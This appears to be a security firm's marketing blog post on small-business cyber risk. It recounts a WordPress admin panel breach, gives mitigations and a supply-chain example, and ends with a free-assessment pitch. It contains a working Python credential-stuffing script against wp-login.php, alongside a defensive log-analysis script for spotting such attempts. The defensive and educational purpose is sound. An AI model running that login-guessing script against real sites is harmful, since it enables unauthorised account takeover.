Why Small Businesses Are the #1 Target for Cyberattacks
During a recent assessment of a family-owned accounting firm in Boise, we found their entire client database - tax records, SSNs, bank account numbers - accessible from a publicly exposed admin panel with the password set to the company name. Nobody had looked at it in three years.
Large enterprises make the headlines. Small businesses bear the real cost. The accounting firm we assessed is not an outlier - it's the rule. Attackers love small businesses precisely because the defenses are thin and the data is valuable.
What We Actually Find in Small Business Assessments
In nearly every small business engagement, we find at least one of the following within the first hour:
- An admin interface exposed to the internet with default or weak credentials
- Unpatched software with known CVEs - sometimes years old
- No multi-factor authentication on email or cloud accounts
- Sensitive files sitting in a publicly accessible cloud storage bucket
A Real Finding: Exposed Admin Panel (OWASP A07 - Identification and Authentication Failures)
On the Boise accounting firm engagement, we discovered a WordPress admin panel at /wp-admin with no account lockout and no MFA. We ran a simple credential stuffing test using a publicly available breach dataset and gained access in under four minutes:
```python
# Simplified credential stuffing simulation (run only against systems you are authorized to test)
import requests

target = "https://target-site.com/wp-login.php"
# Candidate pairs; the real test drew from a public breach corpus
credentials = [("admin", "admin"), ("admin", "password"), ("admin", "companyname2019")]

session = requests.Session()
for attempt, (user, pwd) in enumerate(credentials, start=1):
    # A failed WordPress login re-renders the form with HTTP 200; a successful one
    # answers 302 to /wp-admin/ and sets a wordpress_logged_in_* cookie.
    r = session.post(target, data={"log": user, "pwd": pwd, "wp-submit": "Log In"},
                     allow_redirects=False, timeout=10)
    logged_in = r.status_code == 302 and any(
        c.name.startswith("wordpress_logged_in_") for c in session.cookies)
    if logged_in:
        print(f"[+] Valid credentials on attempt #{attempt}: {user}:{pwd}")
        break
    session.cookies.clear()  # do not carry cookies from a failed attempt forward
# Result: access gained in attempt #3
```
Fix: Enable MFA, implement account lockout after 5 failed attempts, and use a unique strong password stored in a password manager. For WordPress specifically, limit /wp-admin access by IP at the server level.
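An attack like the one above also leaves an obvious trail in the web server log, and reading it is the cheapest detection a small business can run. The following is an added example written for this article, not code from the engagement: it scans constructed nginx-style access log lines for repeated POSTs to wp-login.php from one source address, and flags a 302 that follows a run of 200s, which on WordPress means a guess finally worked. The log format, the sample addresses and the five-attempt threshold (chosen to mirror the lockout policy in the fix above) are all assumptions.

```python
import re
from collections import defaultdict

# nginx "combined" log format. All lines below are constructed for this example.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \d+'
)

SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2024:02:14:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4811 "-" "python-requests/2.31.0"
203.0.113.7 - - [12/Mar/2024:02:14:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4811 "-" "python-requests/2.31.0"
203.0.113.7 - - [12/Mar/2024:02:14:02 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "python-requests/2.31.0"
198.51.100.20 - - [12/Mar/2024:09:30:10 +0000] "GET /wp-login.php HTTP/1.1" 200 4811 "-" "Mozilla/5.0"
198.51.100.20 - - [12/Mar/2024:09:30:15 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.44 - - [12/Mar/2024:11:00:00 +0000] "POST /wp-login.php HTTP/1.1" 200 4811 "-" "curl/8.4.0"
192.0.2.44 - - [12/Mar/2024:11:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4811 "-" "curl/8.4.0"
192.0.2.44 - - [12/Mar/2024:11:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4811 "-" "curl/8.4.0"
192.0.2.44 - - [12/Mar/2024:11:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4811 "-" "curl/8.4.0"
192.0.2.44 - - [12/Mar/2024:11:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4811 "-" "curl/8.4.0"
"""

FAILED_THRESHOLD = 5  # assumed value; matches the "lock after 5 failed attempts" policy


def analyze(log_text, threshold=FAILED_THRESHOLD):
    """Return per-IP findings for POSTs to wp-login.php.

    WordPress re-renders the login form with 200 on a failed guess and answers
    302 (redirect to /wp-admin/) on success, so a 302 after one or more 200s
    from the same address is a guess that landed.
    """
    failed = defaultdict(int)
    success_after_failures = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not m["path"].startswith("/wp-login.php"):
            continue
        ip, status = m["ip"], int(m["status"])
        if status == 200:
            failed[ip] += 1
        elif status == 302 and failed.get(ip, 0) > 0:
            success_after_failures[ip] = failed[ip]

    findings = {}
    for ip in set(failed) | set(success_after_failures):
        findings[ip] = {
            "failed": failed[ip],
            "brute_force": failed[ip] >= threshold,          # noisy guessing, even if it failed
            "likely_compromise": ip in success_after_failures,  # guessing that ended in a login
        }
    return findings


if __name__ == "__main__":
    for ip, finding in sorted(analyze(SAMPLE_LOG).items()):
        print(ip, finding)
```

The legitimate login from 198.51.100.20 (one GET, one successful POST) produces no finding, 192.0.2.44 trips the brute-force threshold without getting in, and 203.0.113.7 reproduces the engagement: two failures and then a 302. The status-code heuristic is specific to stock WordPress; a site behind a login plugin or a WAF may answer differently, so check a known-good and a known-bad login in your own log before trusting the thresholds.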
You're Also a Supply Chain Target
Many small businesses are vendors or contractors for larger companies. Attackers specifically target the small fish to get upstream access to the big one. In 2020, attackers inserted a backdoor into a routine update of SolarWinds' Orion software; roughly 18,000 customers downloaded the trojanized update, and the attackers then picked a much smaller set of high-value targets to exploit. SolarWinds itself was not a small company, but the lesson applies at every scale: those customers were never attacked directly, only through a vendor they all trusted. You don't have to be big to be a door.
Start Here
- Enable MFA on every account - email, cloud, banking, everything.
- Keep all software updated. Enable automatic updates wherever possible.
- Use a password manager. One unique password per account.
- Know what's exposed. A free security assessment takes two minutes and tells you exactly what attackers can see right now.
Have questions about your security posture?
Blackhount offers free security assessments for Idaho businesses. No commitment, no jargon - just honest answers about what we find.
Get a Free Assessment